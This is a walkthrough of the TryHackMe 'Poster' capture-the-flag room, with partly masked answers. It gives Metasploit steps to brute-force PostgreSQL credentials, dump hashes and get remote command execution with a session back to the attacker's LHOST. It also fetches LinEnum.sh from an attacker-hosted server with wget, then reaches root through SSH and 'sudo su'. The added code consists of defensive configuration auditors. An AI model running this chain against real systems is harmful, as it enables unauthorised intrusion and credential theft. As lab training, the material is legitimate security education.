The skills tested and needed to solve this room are: RDBMS, PostgreSQL, nmap, Metasploit, privilege escalation, SSH, find and enumeration.
This room was released today, 9/11/2020. Shout-out to the room creator, @stuxnet. You can access the room at https://tryhackme.com/roomposter
I was assigned a target IP address of 10.10.66.128. You will be assigned a different IP address, so double check your entries when following this walk-through.
The requirements to complete this room are:
- What is the rdbms installed on the server?
- p*********
- What port is the rdbms running on?
- 5***
- Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
- No answer needed
- After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module (starting with auxiliary)?
- auxiliary/s******/p*******/p*******_*****
- What are the credentials you found?
- p*******:p*******
- What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
- auxiliary/a****/p*******/p*******_***
- Based on the results of #6, what is the rdbms version installed on the server?
- 9.*.**
- What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
- auxiliary/s******/p*******/p*******_********
- How many user hashes does the module dump?
- *
- What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
- auxiliary/a****/p*******/p*******_********
- What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
- exploit/m****/p*******/p*******_****_****_*******_***_****
- Compromise the machine and locate user.txt
- THM{p*********_****_************n}
- Escalate privileges and obtain root.txt
- THM{c*******_***_****_***_****_****_**********s}
Steps:
1. Scan the machine using nmap. Type nmap -sC -sV 10.10.66.128
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan

The screenshot above answers the following questions:
- What is the rdbms installed on the server?
- p*********
- What port is the rdbms running on?
- 5***
2. Start Metasploit by typing msfconsole


3. Search for an associated auxiliary module that allows us to enumerate user credentials. Type grep auxiliary search postgres
- grep auxiliary – we want to specifically grab modules that have the word auxiliary in them
- search postgres – now that we know that we are working on postgresql, it just makes sense to look for postgres modules

The screenshot above answers the question below. Since we are being asked about “user credentials”, it makes sense to pick the PostgreSQL login utility module:
- Search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module?
- auxiliary/s******/p*******/p*******_*****
4. To use the module, type use 7 and hit enter

5. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Then type run to start the scan

The screenshot above answers the next question:
- What are the credentials found?
- p*******:p*******
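The credentials above are found because the database accepts password logins from the attacker's network and the role still has a guessable password. Below is an added defender-side example (mine, not the room's or the walkthrough's code): a small auditor for PostgreSQL's pg_hba.conf that flags rules exposing the server to wide networks, allowing passwordless (trust) or cleartext (password) logins, or letting the superuser role connect remotely. The pg_hba.conf content is constructed for the example and the broadness thresholds (/16 for IPv4, /48 for IPv6) are this example's own choice.

```python
"""Audit pg_hba.conf rules for overly permissive client access.

Added example (not from the walkthrough or from the room). The sample
pg_hba.conf content below is constructed; it is not the target's real file.
"""
import ipaddress
from typing import Dict, List

# Constructed sample: a mix of tight and loose rules
SAMPLE_PG_HBA = """
# TYPE  DATABASE  USER      ADDRESS         METHOD
local   all       postgres                  peer
host    all       all       127.0.0.1/32    scram-sha-256
host    all       all       0.0.0.0/0       md5
host    all       postgres  10.0.0.0/8      trust
hostssl all       all       ::/0            password
"""

# trust needs no password at all; password sends it in cleartext
WEAK_METHODS = {"trust", "password"}
LEGACY_METHODS = {"md5"}


def parse_pg_hba(text: str) -> List[Dict[str, str]]:
    """Parse the common single-line rule forms (ADDRESS as CIDR or keyword).

    The two-field 'address netmask' form and @file includes are not handled.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "local" and len(parts) >= 4:
            rules.append({"type": parts[0], "database": parts[1],
                          "user": parts[2], "address": "", "method": parts[3]})
        elif parts[0] in ("host", "hostssl", "hostnossl") and len(parts) >= 5:
            rules.append({"type": parts[0], "database": parts[1],
                          "user": parts[2], "address": parts[3], "method": parts[4]})
    return rules


def address_is_broad(address: str) -> bool:
    """True when ADDRESS admits a large range: the 'all' keyword, a /16-or-wider
    IPv4 network, or a /48-or-wider IPv6 network (thresholds chosen for this example)."""
    if address == "all":
        return True
    if address in ("samehost", "samenet"):
        return False
    try:
        net = ipaddress.ip_network(address, strict=False)
    except ValueError:
        return False  # hostnames are not evaluated here
    return net.prefixlen <= (16 if net.version == 4 else 48)


def audit_pg_hba(text: str) -> List[Dict[str, object]]:
    """Return one finding per rule that exposes the server more than it should."""
    findings = []
    for rule in parse_pg_hba(text):
        issues = []
        if rule["method"] in WEAK_METHODS:
            issues.append(f"method '{rule['method']}' requires no password or sends it in cleartext")
        elif rule["method"] in LEGACY_METHODS:
            issues.append("md5 is a legacy method; prefer scram-sha-256")
        if rule["type"] != "local":
            if address_is_broad(rule["address"]):
                issues.append(f"address {rule['address']} admits a wide network")
            if rule["user"] == "postgres":  # default superuser role name
                issues.append("superuser role may log in over the network")
        if issues:
            findings.append({"rule": rule, "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_pg_hba(SAMPLE_PG_HBA):
        r = finding["rule"]
        print(f"{r['type']} {r['database']} {r['user']} {r['address']} {r['method']}")
        for issue in finding["issues"]:
            print("  -", issue)
```

Run against a real pg_hba.conf by passing the file's contents to audit_pg_hba; on the sample, the loopback scram-sha-256 rule and the local peer rule pass, while the three network rules are reported.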
6. Search for a module that allows you to execute commands with proper user credentials. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the question below:
- What is the full path of the module that allows you to execute commands with proper user credentials?
- auxiliary/a****/p*******/p*******_***
7. To use the module, type use 3 and hit enter

8. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the scan

The screenshot above answers the next question:
- Based on the results of #6, what is the rdbms version installed on the server?
- 9.*.**
9. Search for a module that allows for dumping user hashes. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the next question:
- What is the full path of the module that allows for dumping user hashes?
- auxiliary/s******/p*******/p*******_********
10. To use the module, type use 6 and hit enter

11. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the scan

The screenshot above answers the next question:
- How many user hashes does the module dump?
- *
12. Search for a module that allows authenticated user to view files of their choosing on the server. What is the full path of the module? Type grep auxiliary search postgres

13. Search for an exploit that allows arbitrary command execution with the proper user credentials. What is the full path of the module? Type grep exploit search postgres

14. To use the module, type, use 13

15. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Type set LHOST 10.2.5.154 and hit enter. Remember, for the LHOST, use the IP address of your VPN network adapter, most likely the tun0 adapter. Next type, set PASSWORD p*******. Then type exploit to launch the exploit

16. Transfer LinEnum.sh to the victim machine. First, from our attack machine start our local web server by typing python3 -m http.server 9000

17. On the victim machine, let’s download LinEnum.sh by typing wget http://10.2.5.154:9000/LinEnum.sh. Remember to use your attack machine’s IP address to download the file

18. Run LinEnum.sh by typing ./LinEnum.sh and hit enter. Two files caught my attention: /home/dark/credentials.txt and /var/www/html/config.php. The credentials.txt contains a valid credential but it was a dead end; the config.php file contains the user credential needed to read user.txt
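Both files above leak because a credential sits in a file any local user can read. Below is an added example (mine, not LinEnum's code or anything from the room) of the check a defender would run first: walk a directory tree and report regular files that are both world-readable and contain a credential-looking key. It builds a constructed sample tree in a temporary directory so it runs offline; the file names imitate the kinds of files mentioned in the walkthrough, and their contents are made up.

```python
"""Find world-readable files that look like they hold credentials.

Added example (not from the walkthrough or from LinEnum). It builds a
constructed directory tree under a temporary directory so it runs offline;
the paths and contents imitate the kinds of files the walkthrough mentions
but are not copied from the target.
"""
import os
import re
import stat
import tempfile
from typing import List

# Keys commonly used for secrets in config files; optional quote before = or :
CREDENTIAL_PATTERN = re.compile(r"(?i)(password|passwd|secret|api_key|token)\s*['\"]?\s*[=:]")

# Constructed sample tree: relative path -> (content, mode)
SAMPLE_TREE = {
    "var/www/html/config.php": (
        "<?php\n$db_user = 'app';\n$db_password = 'constructed-example';\n", 0o644),
    "home/dev/credentials.txt": ("username: dev\npassword: constructed-example\n", 0o644),
    "home/dev/notes.txt": ("todo: rotate keys next sprint\n", 0o644),
    "etc/app/secret.conf": ("api_key = constructed-example\n", 0o600),
}


def build_sample_tree() -> str:
    """Create the constructed tree in a fresh temp dir and return its root."""
    root = tempfile.mkdtemp(prefix="cred_audit_")
    for rel, (content, mode) in SAMPLE_TREE.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)  # explicit mode, independent of the umask
    return root


def is_world_readable(path: str) -> bool:
    """True when the 'other' read bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def looks_like_credentials(path: str, max_bytes: int = 65536) -> bool:
    """True when the first max_bytes of the file contain a credential-style key."""
    try:
        with open(path, "r", errors="ignore") as fh:
            return CREDENTIAL_PATTERN.search(fh.read(max_bytes)) is not None
    except OSError:
        return False


def find_exposed_credential_files(root: str) -> List[str]:
    """Return root-relative paths of regular files that are both world-readable
    and contain a credential-like key. Both conditions must hold: a 0600 secret
    file is not reported, and a readable file without secrets is not either."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            if is_world_readable(path) and looks_like_credentials(path):
                exposed.append(os.path.relpath(path, root))
    return sorted(exposed)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel in find_exposed_credential_files(sample_root):
        print("world-readable credential file:", rel)
```

Point find_exposed_credential_files at /var/www or /home on a real host to get the same list an enumeration script would produce; the fix for each hit is to tighten the mode (0640 owned by the service account, for example) or move the secret out of the file.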


19. SSH to the server using the credentials found in the config.php file. Type ssh a*****@10.10.66.128 and hit enter, then supply the password

20. Find the user.txt by typing find / -type f -name user.txt 2> /dev/null

21. Open the file by typing cat /home/a*****/user.txt

22. Escalate our privilege to root. First, type sudo -l to see what our current user is capable of running with sudo privileges

The screenshot above is telling us that the current user is authorized to execute all commands. This is a bad configuration.
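The sudo -l output above corresponds to a sudoers entry of the form user ALL=(ALL) ALL. Below is an added example (mine, not the room's code) of how a defender would catch that before anyone runs sudo -l: a small parser for sudoers user specifications that flags any non-root entry granting ALL commands, or any command with NOPASSWD. The sudoers content is constructed, the user names are placeholders, and the severity labels are this example's own.

```python
"""Audit sudoers entries for unrestricted or passwordless privilege.

Added example (not from the walkthrough). The sudoers content below is
constructed; the user names are placeholders, not the room's accounts.
"""
import re
from typing import Dict, List

# Constructed sample: typical Debian defaults plus a few risky additions
SAMPLE_SUDOERS = """
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
appuser ALL=(ALL) ALL
deploy  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) /usr/sbin/service apache2 restart
"""

# user_or_%group  host=(runas) [TAG:] command[, command...]
ENTRY_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL"}


def parse_sudoers(text: str) -> List[Dict[str, object]]:
    """Parse user specification lines; Defaults, aliases and includes are skipped.

    Tags are collected per entry (real sudo applies a tag to the commands that
    follow it on the line, which is a finer distinction than this audit needs).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@include")) or "_Alias" in line.split()[0]:
            continue
        match = ENTRY_RE.match(line)
        if not match:
            continue
        tags, cmds = set(), []
        for spec in match.group("cmds").split(","):
            spec = spec.strip()
            # Peel leading TAG: prefixes such as "NOPASSWD: ALL"
            while ":" in spec and spec.split(":", 1)[0].strip() in TAGS:
                tag, spec = spec.split(":", 1)
                tags.add(tag.strip())
                spec = spec.strip()
            cmds.append(spec)
        entries.append({"who": match.group("who"), "host": match.group("host"),
                        "runas": match.group("runas") or "root",
                        "tags": tags, "cmds": cmds})
    return entries


def audit_sudoers(text: str) -> List[Dict[str, object]]:
    """Flag entries that grant every command, or any command without a password.
    root's own entry is expected and skipped."""
    findings = []
    for entry in parse_sudoers(text):
        if entry["who"] == "root":
            continue
        unrestricted = "ALL" in entry["cmds"]
        nopasswd = "NOPASSWD" in entry["tags"]
        if not (unrestricted or nopasswd):
            continue
        severity = "critical" if unrestricted else "medium"
        findings.append({"who": entry["who"], "severity": severity,
                         "unrestricted": unrestricted, "nopasswd": nopasswd,
                         "cmds": entry["cmds"]})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['who']}: cmds={f['cmds']} nopasswd={f['nopasswd']}")
```

On a real host, feed it the output of visudo -c -f /etc/sudoers or the files under /etc/sudoers.d. The %sudo group entry is a distribution default and will always be reported; the question to answer is which accounts are members of that group and whether each one needs it.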
23. To escalate our privilege, just type sudo su to switch user to root

24. To retrieve the root flag, type cat root.txt

Hope you enjoyed following my walk-through. Please don’t forget to subscribe to my blog.
Lots of steps on this one. I would’ve given up so kudos for the perseverance.